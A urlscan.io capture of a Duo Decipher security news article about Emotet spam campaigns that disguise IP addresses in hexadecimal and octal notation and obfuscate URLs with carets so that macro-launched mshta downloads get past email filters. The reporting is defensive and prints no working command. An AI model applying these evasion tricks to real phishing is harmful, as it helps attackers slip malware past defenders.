duo.com
Open in
urlscan Pro
13.226.78.41
Public Scan
URL:
https://duo.com/decipher/emotet-spam-attacks-use-hexadecimal-octal-ip-addresses
Submission: On February 02 via manual from JP — Scanned from JP
Submission: On February 02 via manual from JP — Scanned from JP
Form analysis
1 forms found in the DOMGET /decipher/search
<form class="d-search__form" action="/decipher/search" method="GET" onsubmit="submitForm(); return false; " __bizdiag="0" __biza="WJ__">
<input id="input_search" class="d-search__input" type="text" placeholder="Search..." value="">
<button class="btn-magnify js-btn-magnify"><svg class="icon-magnify-thick" viewBox="0 0 512 512">
<path
d="m430 393l-114-114c13-20 22-44 22-71 0-69-56-125-126-125-69 0-125 56-125 125 0 69 56 126 125 126 27 0 51-8 71-23l115 115c4 4 10 7 16 7 6 0 12-3 16-7 9-9 9-24 0-33z m-297-185c0-43 35-78 79-78 43 0 78 35 78 78 0 44-35 79-78 79-44 0-79-35-79-79z">
</path>
</svg></button>
</form>
Text Content
* All Articles * Who We Are * * * * * Security news that informs and inspires SEARCH Jan 21, 2022 EMOTET SPAM ATTACKS USE HEXADECIMAL, OCTAL IP ADDRESSES By Lindsey O’Donnell-Welch The known tactic, which helps attackers sidestep detection, has been observed in spam messages that deploy Emotet. Share Researchers have observed recent Emotet campaigns adopting a known technique - utilizing “unconventional” representations of IP addresses - for the first time, in order to avoid detection. There are various formats for representing IP addresses, the unique numerical addresses assigned to each device on the network. Most are familiar with the dotted-decimal notation, which is the format that uses a string of four decimal numbers with a single period as a separation character. Other representations exist outside of the the dotted-decimal notation, however, including the octal notation, where each decimal number is converted to octal values, and the hexadecimal notation, where each decimal number is converted to hexadecimal values. Web browsers accept these different IP formats as valid by automatically converting them to a dotted-decimal IP address. Threat actors launching spam or phishing attacks have previously employed such encoded hexadecimal and octal IP address formats in their URL hostname parts - including ones in 2020 to redirect victims to websites selling fake pills, medicine, and health products - in order to trick the email gateway and lure the end-user victim into clicking the URLs. Researchers with Trend Micro in a Friday analysis of the attack said they believe this was the aim of the spammers in a recently observed campaign, which had the end goal of infecting email recipients with the Emotet malware. Ian Kenefick, threat hunter with Trend Micro, said that while the abuse of these IP address formats by cybercriminals has been prevalent over the past decade, it's the first time this tactic has been observed in Emotet campaigns. "The actors behind Emotet are constantly tweaking their techniques in order to evade defenses and this latest development represents yet another effort to sidestep defenses," said Kenefick. The spam campaign, which targeted victims in North America, Europe and Asia, used hijacked email threads with an attached document leveraging Excel 4.0 macros, a feature that is commonly abused by cybercriminals (and that Microsoft this week announced would be disabled by default for Microsoft 365 tenants). Once the target enabled macros, the malware was executed. > "The actors behind Emotet are constantly tweaking their techniques in order to > evade defenses and this latest development represents yet another effort to > sidestep defenses." In the recent Emotet campaign, “the URL is obfuscated with carets and the host contains a hexadecimal representation of the IP address,” said researchers. “Once executed, the macro invokes cmd.exe > mshta.exe with the URL containing the hex representation of the IP address as an argument, which will download and execute an HTML application (HTA) code from the remote host.” Similarly, researchers found the URL obfuscated with carets and the IP address containing the octal representation in another email. Upon receiving these standards, operating systems would automatically convert the values to the dotted-decimal representation to initiate the request from the remote servers, researchers said. These hexadecimal and octal IP addresses could help attackers evade spam detection systems and URL blocklists, but on the other hand security teams can view the tactic as a detection opportunity by enabling filters that detect such IP addresses as suspicious. “Users and businesses are cautioned to detect, block, and enable the relevant security measures to prevent compromise using Emotet for second stage delivery of malware such as TrickBot and Cobalt Strike,” said Kenefick. He added, organizations can "use security solutions which leverage behaviour monitoring, machine learning technologies and custom sandboxing – all of which combine to provide an effective defense against new techniques without requiring specific updates to detect them." After returning in November - nearly ten months after law enforcement disrupted its infrastructure in an international coordinated operation - Emotet has been seen in various spam campaigns in recent months. In December, researchers observed the malware updating its attack vector by installing Cobalt Strike beacons directly, for instance, rather than dropping an intermediate payload first. Kenefick said researchers expect Emotet actors to continue to evolve their tactics in an effort to evade security solutions. "While the exact techniques they use to bypass defenses will continue to change and are harder to predict, their business model and focus is well defined – building a leading criminal platform for malware distribution that allows their criminal customer base to serve up malware directly to their target demographics at scale," Kenefick said. Emotet Malware Spammers Related Iot Security BOTENAGO MALWARE SOURCE CODE UPLOADED TO GITHUB The source code's release on GitHub can potentially mean future attacks on IoT devices and routers, warn researchers. Q&a Q&A: TIMO STEFFENS Timo Steffens, private security researcher and author of Attribution of Advanced Persistent Threats, discusses some of the top... Malware DTPACKER MALWARE STEALS DATA, LOADS SECOND-STAGE PAYLOADS Researchers have been tracking the malware packer since 2020 in dozens of campaigns that have impacted hundreds of victims. * * * * All Articles Who We Are Copyright 2022 Duo Security Terms & Conditions Privacy Notice Top